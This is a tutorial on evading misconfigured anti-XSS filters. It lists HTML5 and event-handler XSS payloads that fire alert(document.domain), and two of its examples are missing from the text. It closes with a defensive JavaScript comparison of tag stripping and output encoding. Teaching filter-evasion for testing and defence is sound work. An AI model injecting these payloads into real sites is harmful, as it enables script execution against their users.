Guide: Cross-Site Scripting (XSS) Evasion Techniques – Part 2

After sorting out the basic concepts in Part 1, I think it’s time to continue with more complicated techniques. Our main area of focus will be the evasion of misconfigured Anti-XSS modules.

If the web application forbids the character “/” and the payload is reflected into the HTML document, we can use an HTML tag that does not require “/” in order to work properly. For example, the image tag:

<img src=x onmouseover=alert(document.domain)>

What if the application does not allow spaces to be reflected in the response page? Then we can use something like the following:


What if we can write inside the <body> tag? Then we can start using events like the onload event. For example:

<body onload=alert(document.domain)>

What if the application has an Anti-XSS mechanism that removes the valid tags but does not apply its regular expressions recursively? Then we can use an intentionally malicious tag which will be valid after the first pass of the security mechanism. For example:


What if all the (theoretically) known tags have been blacklisted as invalid? Let's use HTML5 tags. For example:

Using a self-executing focus event via autofocus

<input onfocus=alert(document.domain) autofocus>

Using the <VIDEO> poster attribute

<video poster=javascript:alert(document.domain)//></video>

Using the <BODY> onscroll autofocus

<body onscroll=alert(document.domain)><br><br>...<br><br><input autofocus>

Using the <VIDEO> and <SOURCE> tags

<video><source onerror="alert(document.domain)">

Using the <BODY> and oninput attribute

<body oninput=alert(document.domain)><input autofocus>

Using the HTML5 <picture> element and “srcset” attributes

<picture><source srcset="x"><img onerror="alert(document.domain)"></picture>
<picture><img srcset="x" onerror="alert(document.domain)"></picture>
<img srcset="x" onerror="alert(document.domain)">
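Seen from the filter's side, the single-pass removal and the tag blacklist discussed above fail for different reasons. The following is an added example, not code from the original post: the function names and the blacklist are hypothetical, and the sample inputs are constructed (the second is one of the payloads listed on this page). It compares a one-pass strip, a strip repeated to a fixed point, and output encoding.

```javascript
// Added example. Function names and the blacklist are hypothetical;
// the sample inputs are constructed (the second is a payload from this page).

// A blacklist-style filter of the kind the post evades.
const BLACKLIST = /<\/?(script|img|body|iframe)\b[^>]*>/gi;

// Weak: one pass only, so removing an inner tag can assemble an outer one.
function stripOnce(input) {
  return input.replace(BLACKLIST, "");
}

// Better, still a blacklist: repeat until the output stops changing.
function stripToFixedPoint(input, maxPasses = 20) {
  let current = input;
  for (let i = 0; i < maxPasses; i++) {
    const next = stripOnce(current);
    if (next === current) return next;
    current = next;
  }
  throw new Error("input did not stabilise; reject it");
}

// Preferred for HTML body context: encode on output instead of guessing tags.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// True if the string still contains something a browser parses as a tag.
function hasMarkup(s) {
  return /<[a-z\/!]/i.test(s);
}

// Run all three strategies over one input and report whether markup survives.
function audit(input) {
  return {
    stripOnce: hasMarkup(stripOnce(input)),
    stripToFixedPoint: hasMarkup(stripToFixedPoint(input)),
    escapeHtml: hasMarkup(escapeHtml(input)),
  };
}

const NESTED = "<scr<script>ipt>alert(document.domain)</scr</script>ipt>";
const HTML5 = "<input onfocus=alert(document.domain) autofocus>";
console.log(audit(NESTED), audit(HTML5));
```

Repeating the strip closes the nesting gap but leaves the non-blacklisted tag untouched, while encoding neutralises both inputs. The `escapeHtml` helper covers HTML body and quoted-attribute contexts only; values placed in script, URL or CSS contexts need the encoder for that context.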